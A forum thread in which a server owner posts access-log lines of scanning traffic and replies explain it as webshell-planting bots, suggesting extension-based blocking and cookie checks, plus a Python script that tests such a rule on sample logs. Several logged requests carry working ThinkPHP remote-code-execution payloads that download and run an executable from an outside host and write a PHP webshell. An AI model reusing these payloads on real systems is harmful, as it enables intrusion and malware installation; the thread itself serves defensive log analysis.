46.246.62.176 - - [12/Oct/2019:01:40:24 +0800] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:21 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /elrekt.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /index.php HTTP/1.1" 404 97
139.162.88.63 - - [12/Oct/2019:18:06:31 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
106.14.152.42 - - [12/Oct/2019:19:33:47 +0800] "HEAD /phpinfo.php HTTP/1.1" 404 -
139.162.88.63 - - [12/Oct/2019:19:39:00 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /elrekt.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /index.php HTTP/1.1" 404 97
1
lx0758 2019-10-21 13:59:45 +08:00
Obviously, this is someone scanning you for vulnerabilities.
|
2
Vegetable 2019-10-21 14:02:15 +08:00
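This is a kind-hearted person helping you check your server for vulnerabilities; once they find one, they'll notify you by hacking you. There's probably no particularly good way to block it. I just ignore it.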
|
3
eason1874 2019-10-21 14:05:54 +08:00
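Routine work for webshell-planting bots: scanning for publicly disclosed vulnerabilities in all kinds of CMSes and frameworks.
Here's a simple, brute-force approach: if you're sure the whole site has no URLs ending in .php, .asp or .jsp, just reject every request with those endings. If it does, plant a cookie on the user's first visit and only allow access after the cookie has been verified. That handles most of it, because most of these bots don't store cookies.
|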
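The first rule from the reply above, as an added example (not code from the thread): a Python dry run that reads access-log lines in the format posted in the question and reports which client IPs a "reject .php/.asp/.jsp" rule would have turned away. The sample lines and their IP addresses are constructed, and the script assumes the site serves none of those extensions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumption: the site serves no URLs with these extensions (the reply's rule).
BLOCKED_EXT = (".php", ".asp", ".jsp")

# Access-log layout used in the thread: ip - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

def would_reject(target, blocked=BLOCKED_EXT):
    """True if the request path (query string ignored) has a blocked extension."""
    path = unquote(target.split("?", 1)[0]).lower()
    # Check every segment so "/index.php/extra" and "/x.jsp;jsessionid=1" also match.
    return any(seg.split(";", 1)[0].endswith(blocked) for seg in path.split("/"))

def scan(lines, blocked=BLOCKED_EXT):
    """Return (per-IP count of requests the rule would reject, lines that failed to parse)."""
    hits, unparsed = Counter(), []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            unparsed.append(line)  # keep for manual review instead of dropping silently
            continue
        if would_reject(m["target"], blocked):
            hits[m["ip"]] += 1
    return hits, unparsed

# Constructed sample lines (documentation-range IPs), same layout as the posted log.
SAMPLE = [
    '203.0.113.7 - - [12/Oct/2019:13:12:21 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97',
    '203.0.113.7 - - [12/Oct/2019:13:12:22 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97',
    '203.0.113.9 - - [12/Oct/2019:19:33:47 +0800] "HEAD /phpinfo.php HTTP/1.1" 404 -',
    '198.51.100.4 - - [12/Oct/2019:20:00:01 +0800] "GET /api/orders?file=report.php HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Oct/2019:20:00:02 +0800] "GET /static/app.js HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    hits, unparsed = scan(SAMPLE)
    for ip, count in hits.most_common():
        print(f"{ip}\t{count} request(s) would be rejected")
    print(f"{len(unparsed)} line(s) could not be parsed")
```

Running it against a real log before enabling the rule shows whether any legitimate client would be caught, for example if part of the site does serve .jsp pages.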
4
xwbz2018 OP
@lx0758 Yeah, I can tell they're up to something. The server is Linux + Java, so it won't affect normal use... But how is this kind of thing usually handled?
|